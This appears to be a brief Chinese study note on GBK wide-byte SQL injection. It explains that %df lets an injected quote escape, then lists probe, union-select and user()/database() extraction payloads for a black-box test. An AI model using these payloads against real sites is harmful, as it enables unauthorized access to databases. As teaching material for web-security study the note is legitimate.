10.宽字节注入

原理

利用%df使注入语句逃逸

 

 

代码审计

黑盒测试下的宽字节注入

试探

字符型试探

?id=1%df%27%23

试探成功

注入获取敏感信息

?id=1%df%27 union select 1,2,3%23

 

 

?id=%df%27 union select 1,user(),database() %23

这里的关键要让第一个语句错误 ：?id=%df%27

这里让第一个语句直接错误